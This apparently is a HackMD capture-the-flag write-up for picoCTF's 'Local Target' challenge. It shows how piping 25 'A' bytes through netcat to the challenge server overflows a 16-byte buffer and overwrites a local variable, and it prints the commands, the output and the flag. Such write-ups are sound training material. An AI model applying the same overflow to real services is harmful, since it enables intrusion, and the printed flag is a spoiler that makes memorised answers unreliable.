Local Target - HackMD

## Main Point ### echo+netcat ` echo 'test' | netcat server 7 ` ref: https://unix.stackexchange.com/questions/332163/netcat-send-text-to-echo-service-read-reply-then-exit #### echo -e The `-e` option allows you to change the format of the output while using echo. (source: https://www.linuxjournal.com/content/echo-command#:~:text=The%20%2De%20option%20allows%20you,behavior%20as%20actually%20pressing%20backspace.) ## Writeup 1. In source code, we can see `char input[16];`, which means that input has the size of 16 bytes. And in description of the question, it says *overflow the buffer and modify the other local variable*. Therefore we should make our input longer than 16 bytes. 2. The second hint says that *When you change num, view the value as hexadecimal.*, so send the string `'\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41'`(17`\x41` in total) by the command `echo '\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41' | nc saturn.picoctf.net 52421` 3. But then you'll find that it's still not long enough to cause overflow, so add `\x41` one at a time, and you'll succeed when there are 25 `\x41`, which looks like this: ```bash ┌──(kali㉿kali)-[~] └─$ echo '\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41' | nc saturn.picoctf.net 52421 Enter a string: num is 65 You win! picoCTF{l0c4l5_1n_5c0p3_ee58441a} ``` \*NOTE: `echo -e echo '\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41' | nc saturn.picoctf.net 52421` (parameter `-e` added) works as well 4. If interact with the server directly, use `A` (65) instead ```shell ┌──(kali㉿kali)-[~/code/GDBed_files] └─$ ./local-target Enter a string: AAAAAAAAAAAAAAAAA num is 64 Bye! ┌──(kali㉿kali)-[~/code/GDBed_files] └─$ ./local-target Enter a string: AAAAAAAAAAAAAAAAAAAAAAAAA num is 65 You win! picoCTF{i_am_a_fake_flag} ┌──(kali㉿kali)-[~/code/GDBed_files] └─$ nc saturn.picoctf.net 49377 Enter a string: AAAAAAAAAAAAAAAAAAAAAAAAA num is 65 You win! picoCTF{l0c4l5_1n_5c0p3_ee58441a} ```